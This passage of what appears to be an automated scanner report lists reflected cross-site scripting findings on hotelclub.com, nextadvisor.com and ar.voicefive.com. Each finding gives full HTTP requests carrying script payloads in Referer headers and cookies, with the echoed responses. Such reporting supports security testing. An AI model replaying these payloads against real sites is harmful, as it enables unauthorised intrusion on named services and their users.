<meta content=
...[SNIP]...
<input type="text" validate="name" class="hp-form-field " value="87203"><script>alert(1)</script>ef9dea1c101" id="last_name" name="last_name" gtbfieldid="2">
...[SNIP]...

5.84. http://www.hotelclub.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.hotelclub.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12eb7"><script>alert(1)</script>7915b0ca952 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: www.hotelclub.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=12eb7"><script>alert(1)</script>7915b0ca952

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private,must-revalidate, no-store, no-cache,pre-check=0, post-check=0, max-age=0, max-stale = 0
Cteonnt-Length: 232790
Content-Type: text/html; Charset=windows-1252
Expires: Sat, 23 Apr 2011 13:13:24 GMT
Cache-Control: private,must-revalidate, no-store, no-cache,pre-check=0, post-check=0, max-age=0, max-stale = 0
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 13:13:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: HTC=AppVer=1%2E0; path=/
Set-Cookie: AffiliateLogID=%2D1963682320; expires=Mon, 23-May-2011 14:00:00 GMT; path=/
Set-Cookie: anon=54655092954620110424230132; expires=Sun, 31-Dec-2034 13:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDQSSAQDRQ=AADPBCECPKGHNOFGNCIEEIBL; path=/
Set-Cookie: NSC_JOj4vajjejllb1veb0r04rbl5rcbheu=ffffffff09d7273c45525d5f4f58455e445a4a422974;path=/;httponly
Content-Length: 232790

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html dir="ltr" lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...
<meta name="DCSext.rs" content="http://www.google.com/search?hl=en&q=12eb7"><script>alert(1)</script>7915b0ca952"/>
...[SNIP]...

5.85. http://www.nextadvisor.com/link.php [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /link.php

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 881a1"><script>alert(1)</script>c0ea8f8c816 was submitted in the Referer HTTP header. This input was echoed as 881a1\"><script>alert(1)</script>c0ea8f8c816 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /link.php?kw=gid9a%20identity%20theft%20resource_ordering34&category=identitytheft&link=idtheftshield&id=227 HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812
Referer: http://www.google.com/search?hl=en&q=881a1"><script>alert(1)</script>c0ea8f8c816

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:26:39 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 42552


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta name="msvalidate.01
...[SNIP]...
<a href="/link.php?kw=id%20gid9a%20identity%20theft%20resource_ordering34--2011-04-23--20-10-01CD1-fq-881a1\"><script>alert(1)</script>c0ea8f8c816&amp;category=voip&amp;link=vonage&amp;id=632 "target="_blank">
...[SNIP]...

5.86. http://www.nextadvisor.com/pmid [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /pmid

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f376"><script>alert(1)</script>f66b92f9263 was submitted in the Referer HTTP header. This input was echoed as 9f376\"><script>alert(1)</script>f66b92f9263 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /pmid?kw=id%20gid9a%20identity%20theft%20resource_ordering34--2011-04-23--20-10-01CD1 HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812
Referer: http://www.google.com/search?hl=en&q=9f376"><script>alert(1)</script>f66b92f9263

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:31:44 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 8857


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<input type="hidden" name="bcd" value="id%20gid9a%20identity%20theft%20resource_ordering34--2011-04-23--20-10-01CD1-fq-9f376\"><script>alert(1)</script>f66b92f9263">
...[SNIP]...

5.87. http://www.nextadvisor.com/pmid/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /pmid/

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61957"><script>alert(1)</script>3ad037bb494 was submitted in the Referer HTTP header. This input was echoed as 61957\"><script>alert(1)</script>3ad037bb494 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /pmid/?kw=id%2520gid9a%2520identity%2520theft%2520resource_ordering34--2011-04-23--20-10-01CD1 HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812
Referer: http://www.google.com/search?hl=en&q=61957"><script>alert(1)</script>3ad037bb494

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:18:29 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 8857


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<input type="hidden" name="bcd" value="id%20gid9a%20identity%20theft%20resource_ordering34--2011-04-23--20-10-01CD1-fq-61957\"><script>alert(1)</script>3ad037bb494">
...[SNIP]...

5.88. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the BMX_3PC cookie is copied into the HTML document as plain text between tags. The payload 32dd0<script>alert(1)</script>545950acd64 was submitted in the BMX_3PC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732016&AR_C=194941096 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647951817&bpp=4&shv=r20110414&jsv=r20110415&correlator=1303647951838&frm=1&adk=2614322350&ga_vid=2144667481.1303647952&ga_sid=1303647952&ga_hid=2004805199&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=26
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p97174789=exp=2&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 12:25:50 2011&prad=256163694&arc=202065971&; BMX_3PC=132dd0<script>alert(1)</script>545950acd64; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303647950%2E016%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 12:30:13 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=3&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 12:30:13 2011&prad=253732016&arc=194941096&; expires=Sat 23-Jul-2011 12:30:13 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 24957

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732016",Pid:"p97174789",Arc:"194941096",Location:
...[SNIP]...
MX.Broker.Cookies={ "UID": '875e3f1e-184.84.247.65-1303349046', "ar_p97174789": 'exp=2&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 12:25:50 2011&prad=256163694&arc=202065971&', "BMX_3PC": '132dd0<script>alert(1)</script>545950acd64', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1303647950%2E016%2Cwait%2D%3E10000%2C', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&' };

...[SNIP]...

5.89. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the BMX_G cookie is copied into the HTML document as plain text between tags. The payload 299e3<script>alert(1)</script>04ee78f4696 was submitted in the BMX_G cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732016&AR_C=194941096 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647951817&bpp=4&shv=r20110414&jsv=r20110415&correlator=1303647951838&frm=1&adk=2614322350&ga_vid=2144667481.1303647952&ga_sid=1303647952&ga_hid=2004805199&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=26
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p97174789=exp=2&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 12:25:50 2011&prad=256163694&arc=202065971&; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303647950%2E016%2Cwait%2D%3E10000%2C299e3<script>alert(1)</script>04ee78f4696

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 12:30:17 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=3&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 12:30:17 2011&prad=253732016&arc=194941096&; expires=Sat 23-Jul-2011 12:30:17 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 24957

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732016",Pid:"p97174789",Arc:"194941096",Location:
...[SNIP]...
s={ "ar_p97174789": 'exp=2&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 12:25:50 2011&prad=256163694&arc=202065971&', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1303647950%2E016%2Cwait%2D%3E10000%2C299e3<script>alert(1)</script>04ee78f4696', "UID": '875e3f1e-184.84.247.65-1303349046', "BMX_3PC": '1', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&' };
COMSCORE.BMX.Bro
...[SNIP]...

5.90. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the UID cookie is copied into the HTML document as plain text between tags. The payload 14ebe<script>alert(1)</script>6914188f971 was submitted in the UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253735207&AR_C=186884836 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/common/adRevresda.asp?channel=home&Section=main&adsize=728x90&pos=bottom
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; UID=875e3f1e-184.84.247.65-130334904614ebe<script>alert(1)</script>6914188f971

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 12:10:02 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=1&initExp=Sun Apr 24 12:10:02 2011&recExp=Sun Apr 24 12:10:02 2011&prad=253735207&arc=186884836&; expires=Sat 23-Jul-2011 12:10:02 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303647002; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 24741

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253735207",Pid:"p97174789",Arc:"186884836",Location:
...[SNIP]...
;
}else{if(window.attachEvent){return window.attachEvent("onload",C.OnReady.onload);
}}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Broker.Cookies={ "UID": '875e3f1e-184.84.247.65-130334904614ebe<script>alert(1)</script>6914188f971', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobucket.com/
...[SNIP]...

5.91. http://ar.voicefive.com/bmx3/broker.pli [ar_p91300630 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p91300630 cookie is copied into the HTML document as plain text between tags. The payload 23ca7<script>alert(1)</script>3d772f731c6 was submitted in the ar_p91300630 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253735207&AR_C=186884836 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/common/adRevresda.asp?channel=home&Section=main&adsize=728x90&pos=bottom
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&23ca7<script>alert(1)</script>3d772f731c6; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 12:10:00 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=1&initExp=Sun Apr 24 12:10:00 2011&recExp=Sun Apr 24 12:10:00 2011&prad=253735207&arc=186884836&; expires=Sat 23-Jul-2011 12:10:00 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303647000; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 24741

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253735207",Pid:"p97174789",Arc:"186884836",Location:
...[SNIP]...
ull};})();}COMSCORE.BMX.Broker.Cookies={ "UID": '875e3f1e-184.84.247.65-1303349046', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&23ca7<script>alert(1)</script>3d772f731c6' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobucket.com/$|zone.msn.com|xbox.com|www.aol.com/$|http://Webmail.aol.com/$|http://travel.aol.com/$|http://netscape.aol.com/$|http
...[SNIP]...

5.92. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p97174789 cookie is copied into the HTML document as plain text between tags. The payload c4fd8<script>alert(1)</script>77954a0fecc was submitted in the ar_p97174789 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=256163694&AR_C=202065971 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647951817&bpp=4&shv=r20110414&jsv=r20110415&correlator=1303647951838&frm=1&adk=2614322350&ga_vid=2144667481.1303647952&ga_sid=1303647952&ga_hid=2004805199&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=26
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p97174789=exp=1&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 12:09:48 2011&prad=253735207&arc=186884836&c4fd8<script>alert(1)</script>77954a0fecc; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 12:29:11 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=2&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 12:29:11 2011&c4fd8<script>alert(1)</script>77954a0fecc=&prad=256163694&arc=202065971&; expires=Sat 23-Jul-2011 12:29:11 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303648151; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 24862

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"256163694",Pid:"p97174789",Arc:"202065971",Location:
...[SNIP]...
.onload);
